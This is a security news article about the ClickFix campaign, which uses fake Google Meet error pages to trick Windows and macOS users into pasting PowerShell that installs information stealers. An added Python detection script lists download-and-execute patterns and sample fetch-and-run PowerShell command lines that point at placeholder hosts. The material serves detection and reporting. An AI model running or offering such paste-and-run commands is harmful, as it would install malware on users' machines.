Threat actors are using fake Google Meet web pages as part of an ongoing malware campaign known as ClickFix to deliver information stealers targeting Windows and macOS systems.
“This tactic involves displaying fake error messages in web browsers to trick users into copying and executing specified malicious PowerShell code, eventually infecting their systems,” French cybersecurity firm Sekoia said in a report shared with The Hacker News.
Variants of the ClickFix campaign (aka ClearFake and OneDrive Pastejacking) have been widely reported over the past few months, with threat actors using a variety of lures to redirect users to fake pages that aim to deploy malware by prompting site visitors to run encoded PowerShell code to fix a supposed issue with displaying content in the web browser.
These pages are known to masquerade as popular online services, including Facebook, Google Chrome, PDFSimpli and reCAPTCHA, and now Google Meet, as well as possibly Zoom.
On Windows, the attack chain ends with the deployment of the StealC and Rhadamanthys stealers, while Apple macOS users are served a disk image file (“Launcher_v1.94.dmg”) that drops another stealer known as Atomic.
This new social engineering tactic cleverly evades detection by security tools because it relies on the user manually running a malicious PowerShell command directly in a terminal, rather than on a downloaded payload being executed automatically.
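The paste-and-run pattern described above leaves a trace in process-creation telemetry: a PowerShell host spawned by an interactive parent with a download-and-execute one-liner on its command line. The following is an added detection example written for this article, not code from Sekoia's report; the parent-process heuristic, the scoring weights and the sample events are constructed assumptions.

```python
import re

# Parents that mean a person launched the shell from the desktop, a Run box or a
# console, rather than a script or service spawning it (assumption about the host).
INTERACTIVE_PARENTS = {"explorer.exe", "windowsterminal.exe", "cmd.exe"}

# Download-and-execute cradles commonly seen in copy-and-paste lures.
CRADLES = [r"\biex\b", r"invoke-expression", r"\birm\b", r"invoke-restmethod",
           r"\biwr\b", r"invoke-webrequest", r"downloadstring", r"downloadfile",
           r"https?://"]

# Flags that hide the console or bypass policy; each adds weight, none is decisive.
EVASION = {"hidden window": r"-w(indowstyle)?\s+hidden",
           "encoded command": r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{8,}",
           "execution policy bypass": r"-e(p|xecutionpolicy)\s+bypass"}

def score_event(parent: str, cmdline: str):
    """Return (score, reasons). A score of 3 or more is treated as a ClickFix-style paste."""
    reasons, score = [], 0
    cl = cmdline.lower()
    if parent.lower().rsplit("\\", 1)[-1] in INTERACTIVE_PARENTS:
        reasons.append("interactive parent"); score += 1
    if any(re.search(p, cl) for p in CRADLES):
        reasons.append("download cradle"); score += 2
    for name, pat in EVASION.items():
        if re.search(pat, cl):
            reasons.append(name); score += 1
    return score, reasons

def find_clickfix(events, threshold=3):
    """events: iterable of (parent_image, command_line); returns flagged command lines."""
    flagged = []
    for parent, cmd in events:
        score, reasons = score_event(parent, cmd)
        if score >= threshold:
            flagged.append((cmd, reasons))
    return flagged

# Constructed sample events: (parent image, PowerShell command line). The URLs are
# placeholders and the base64 blob decodes to the harmless string "AAAAAAAA".
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe",
     'powershell -w hidden -c "iex (irm http://meet-example.invalid/fix)"'),
    (r"C:\Windows\explorer.exe", 'powershell -NoProfile -Command "Get-ChildItem C:\\Users"'),
    (r"C:\Windows\System32\cmd.exe", 'powershell -c "iwr http://meet-example.invalid/a.ps1 | iex"'),
    (r"C:\Program Files\Backup\agent.exe", 'powershell -enc QQBBAEEAQQBBAEEAQQBBAA=='),
]

if __name__ == "__main__":
    for cmd, why in find_clickfix(SAMPLE_EVENTS):
        print(f"SUSPICIOUS ({', '.join(why)}): {cmd}")
```

On a real host the same logic would run over Sysmon Event ID 1 or Windows Security 4688 records, where the parent image and command line are native fields.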
Sekoia attributed the Google Meet-mimicking cluster to two groups of traffers, namely Slavic Nation Empire (aka Slavice Nation Land) and Scamquerteo, which are sub-teams within markopolo and CryptoLove respectively.
“Both traffer teams (…) use the same ClickFix template that mimics Google Meet,” Sekoia said. “This discovery suggests that these teams are sharing materials, also known as ‘landing blueprints’, as well as infrastructure.”
This, in turn, raises the possibility that both threat groups are using the same as-yet-unknown cybercrime service, with a third party likely running their infrastructure.
The development comes against the backdrop of the emergence of malware campaigns distributing an open-source stealer called ThunderKitty, which shares overlaps with Skuld and Kematian Stealer, as well as new stealer families named Divulge, DedSec (aka Doenerium), Duck, Vilsa and Yunit.
“The rise of open-source information stealers represents a significant shift in the world of cyber threats,” cybersecurity firm Hudson Rock noted back in July 2024.
“By lowering the barrier to entry and facilitating rapid innovation, these tools could fuel a new wave of computer infections, creating challenges for cybersecurity professionals and increasing the overall risk to businesses and individuals.”